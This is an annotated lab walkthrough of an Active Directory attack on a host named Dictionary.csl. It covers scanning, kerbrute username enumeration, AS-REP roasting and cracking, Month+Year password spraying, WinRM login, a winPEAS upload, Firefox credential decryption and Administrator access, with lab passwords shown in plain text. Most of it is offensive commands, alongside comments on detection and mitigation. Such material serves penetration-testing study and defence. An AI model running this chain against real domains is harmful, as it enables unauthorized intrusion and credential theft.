# Map the lab hostname Dictionary.csl to 172.31.3.4 in /etc/hosts; the kerbrute
# and GetNPUsers steps further down address the domain and DC by this name.
# tee -a appends, so re-running this line leaves a duplicate entry behind.
echo "172.31.3.4 Dictionary.csl" | sudo tee -a /etc/hosts

# Full-range TCP scan (-p-) with -A (OS and version detection, script scanning,
# traceroute) plus the "vuln" NSE category; -oA writes output.nmap, output.gnmap
# and output.xml. --min-rate=10000 and the 15 s script timeout favour speed over
# completeness, so missed ports or truncated script results are possible.
# A sweep at this rate stands out in firewall and IDS logs.
nmap -A -p- -oA output 172.31.3.4 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Second full TCP pass at nmap's normal timing: default scripts (-sC), service
# versions (-sV) and OS detection (-O), saved as dictionary.*.
# NOTE(review): -O needs raw-socket privileges and no sudo is shown; presumably
# the session runs as root - confirm.
nmap -sC -sV -O -p- -oA dictionary 172.31.3.4

# UDP scan of every port, saved as dictionary-udp.*; -sU needs root as well.
nmap -sU -O -p- -oA dictionary-udp 172.31.3.4

# List the SMB shares offered by the host. The unquoted backslashes are halved
# by the shell, so smbclient receives \\172.31.3.4\ . No -U or -N is given, so
# smbclient prompts for a password; which identity produced the listing is not
# visible in these notes.
smbclient -L \\\\172.31.3.4\\

Pasted image 20210706084307.png

# Query LDAP on 389/tcp with every NSE script matching ldap* except those in the
# brute category; -n skips DNS resolution. What the directory returned without
# credentials is only in the screenshot that followed - TODO confirm.
nmap -n -sV --script "ldap* and not brute" -p 389 172.31.3.4

https://book.hacktricks.xyz/windows/active-directory-methodology

Pasted image 20210706090804.png

Creamos un archivo llamado users que contiene el nombre de usuario izabel

# Username validation against the KDC: kerbrute sends a Kerberos AS request per
# candidate name and reads the error code to tell existing principals from
# unknown ones. On the DC this appears as a burst of AS requests from a single
# source (event 4768 when Kerberos authentication auditing is enabled).
# NOTE(review): upstream SecLists keeps this list under Usernames/ (plural) and
# the kerbrute release binary is named kerbrute_linux_amd64; verify both names
# against the local install.
./kerbrute_linux_amd_64 userenum -d Dictionary.csl --dc Dictionary.csl /usr/share/seclists/Username/xato-net-10-million-usernames.txt

Pasted image 20210706093911.png

# AS-REP roasting check: for each name in the users file, request an AS-REP
# without credentials. Only accounts flagged "Do not require Kerberos
# preauthentication" answer, and the reply carries material encrypted with a
# key derived from the account password; it is written to dictionaryhashes in
# john format. Mitigation: require pre-authentication on every account, and
# alert on event 4768 with pre-authentication type 0.
# NOTE(review): impacket spells this option -usersfile; as typed, -userfile
# would be rejected by the argument parser - confirm against the screenshot.
python3 /opt/impacket/examples/GetNPUsers.py Dictionary.csl/ -userfile users -format john -outputfile dictionaryhashes

Pasted image 20210706092304.png

Pasted image 20210706092558.png

# Offline dictionary attack on the captured AS-REP material using rockyou.txt.
# Nothing reaches the DC at this stage, so lockout policy does not apply; the
# only protection is a password that is absent from common wordlists.
john --wordlist=/usr/share/wordlists/rockyou.txt dictionaryhashes

Pasted image 20210706092831.png

# Open an interactive MS-RPC session on the DC as izabel; the password is
# prompted for rather than passed in argv (presumably the one recovered by john
# above - confirm).
# NOTE(review): Samba documents the user option as -U (upper case); check the
# flag as typed here.
rpcclient -u "izabel" 172.31.3.4

Pasted image 20210706093608.png

# Typed at the rpcclient prompt opened above, not in the local shell: lists the
# domain's user accounts over SAMR. Any authenticated low-privilege account can
# normally do this, so account names should not be treated as secret.
enumdomusers

Pasted image 20210706093724.png

Agregamos los usuarios enumerados al archivo users

Creamos un script (month_year.py) que genera contraseñas candidatas combinando el mes y el año

Pasted image 20210706121041.png

# month_year.py is the author's generator (shown only in the screenshot); its
# output, the month+year candidates, is saved to the file passwords.
python3 month_year.py > passwords

# Try the users x passwords combinations over SMB. Each miss is a failed logon
# on the DC (event 4625), so a lockout threshold and alerting on many failures
# from one source are the relevant controls; a banned-password list that
# rejects Month+Year patterns removes the weakness itself.
crackmapexec smb 172.31.3.4 -u users -p passwords

Pasted image 20210706121613.png

# Open a WinRM PowerShell session as BACKUP-Izabel with the Month+Year password
# that the previous step validated. Passing -p on the command line leaves the
# password in shell history and in the process list. The logon only works
# because this account is allowed to use WinRM; limiting remote-management
# rights on backup/service accounts narrows this path.
evil-winrm -i 172.31.3.4 -u BACKUP-Izabel -p October2019

Pasted image 20210706122136.png

# Both lines are typed inside the evil-winrm session, not the local shell.
# upload copies winPEASany.exe from the attacking host to the target.
upload winPEASany.exe

# Run the uploaded binary in the remote PowerShell session. winPEAS is a local
# enumeration tool; writing and executing it on disk is the kind of activity
# endpoint protection and process-creation logging are expected to catch.
. .\winPEASany.exe

Pasted image 20210706122612.png

# Run firefox_decrypt against a local directory on the Kali host - presumably a
# Firefox profile copied from the target; how it was retrieved is not shown in
# these notes. Saved logins decrypt without a prompt when no primary password
# is set, so privileged credentials should never be stored in a browser profile.
python3 /opt/firefox_decrypt/firefox_decrypt.py /home/kali/Desktop/boxes/dictionary

Pasted image 20210706131246.png

# Confirm the Administrator credential over WinRM by running whoami (-x).
# The password presumably comes from the Firefox store decrypted above -
# confirm. As with the earlier logon, a password in argv ends up in shell
# history and process listings.
crackmapexec winrm 172.31.3.4 -u Administrator -p kC7pbrQAsTT -x 'whoami'

Pasted image 20210706131607.png
